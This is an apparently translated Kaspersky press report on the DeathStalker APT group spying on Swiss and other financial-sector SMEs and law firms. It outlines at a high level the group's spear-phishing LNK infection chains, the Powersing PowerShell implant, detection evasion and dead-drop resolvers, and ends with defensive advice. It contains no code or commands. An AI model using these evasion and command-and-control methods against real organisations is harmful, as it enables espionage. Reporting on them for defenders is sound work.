The Kaspersky experts register that the APT group DeathStalker spies on Swiss SMEs in particular. The APT Group has other medium-sized companies in its sights worldwide. Victims can often be found in the financial industry and among law firms.
The APT group DeathStalker has been spying on small and medium-sized companies in the financial sector since at least 2012. The latest Kaspersky research shows that DeathStalker has targeted companies in Switzerland and around the world.
DeathStalker specializes specifically in cyber espionage against law firms and organizations in the financial sector. The threat actor is highly adaptable and distinguishes itself by following an iterative, fast, and flexible approach to software design. This is how DeathStalker can run campaigns effectively.
Individual activity spectrum makes detection difficult
Kaspersky-Kaspersky experts were now able to link the activities of DeathStalker with the three malware families Powersing, Evilnum and Janicab, which shows the broad spectrum of activity of the group since at least 2012. While Kaspersky was able to identify Powersing as early as 2018, findings about Evilnum and Janicab were reported by other cybersecurity providers. Analysis of code similarities and victimology between the three malware families made it possible to link them with a medium probability.
The group's tactics, techniques and procedures have remained unchanged over the years: They use individual spear phishing emails to deliver archives containing malicious files. If a user clicks on the shortcut, a malicious script is executed and further components are downloaded from the Internet. In this way, the attackers gain control of the infected device.
DeathStalker uses powersing attacks
Powersing, a power shell-based implant, was the first malware that could be attributed to this threat actor. Once a victim's computer is infected, the malware can take screenshots and run any Powershell script. With alternative persistence methods, which are individually tailored to the security solution used by an infected device, the malware escapes detection. DeathStalker uses it to perform detection tests before each campaign and updates the scripts accordingly.
In a powersing attack, DeathStalker also uses a well-known public service to integrate the initial backdoor communication with legitimate network traffic. This effectively limits the possibility of obstructing such an operation. By employing dead-drop resolvers - tons of information indicating additional command and control infrastructure placed on a variety of legitimate social media, blogging, and messaging services - DeathStalker was able to evade detection and run its own campaigns quickly finalize. Once infected, the victims turn to these resolvers and are redirected by them, thereby hiding the communication chain.
DeathStalker affects businesses worldwide
DeathStalker's actions have been spotted all over the world. Powersing activity was found in Argentina, China, Cyprus, Israel, Lebanon, Switzerland, Taiwan, Turkey, the United Kingdom and the United Arab Emirates. Kaspersky also found Evilnum victims in Cyprus, India, Lebanon, Russia and the United Arab Emirates. Detailed information on indicators of compromise related to this group - including file hashes and C2 servers - can be found on the Kaspersky Threat Intelligence Portal [2].
"DeathStalker is a prime example of a threat actor that private sector organizations need to defend against," said Ivan Kwiatkowski, security researcher at Kaspersky. “While we often focus on the activities of APT groups, DeathStalker reminds us that even organizations that are not traditionally the most security-conscious need to know they can be targeted. Additionally, due to continued activity, we anticipate that DeathStalker will continue to be a threat to organizations worldwide through the use of new tools. This player is further proof that even small and medium-sized businesses need to invest in safety and awareness training. To remain protected from DeathStalker, we advise organizations to disable the ability to use scripting languages such as powershell.exe and cscript.exe wherever possible. We also recommend that future awareness training and security product assessments include infection chains based on LNK (shortcut) files.”
More on this at SecureList from Kaspersky.com
About Kaspersky Kaspersky is an international cybersecurity company founded in 1997. Kaspersky's in-depth threat intelligence and security expertise serve as the basis for innovative security solutions and services to protect companies, critical infrastructures, governments and private users worldwide. The company's comprehensive security portfolio includes leading endpoint protection as well as a range of specialized security solutions and services to defend against complex and evolving cyber threats. Kaspersky technologies protect over 400 million users and 250.000 corporate customers. More information about Kaspersky can be found at www.kaspersky.com/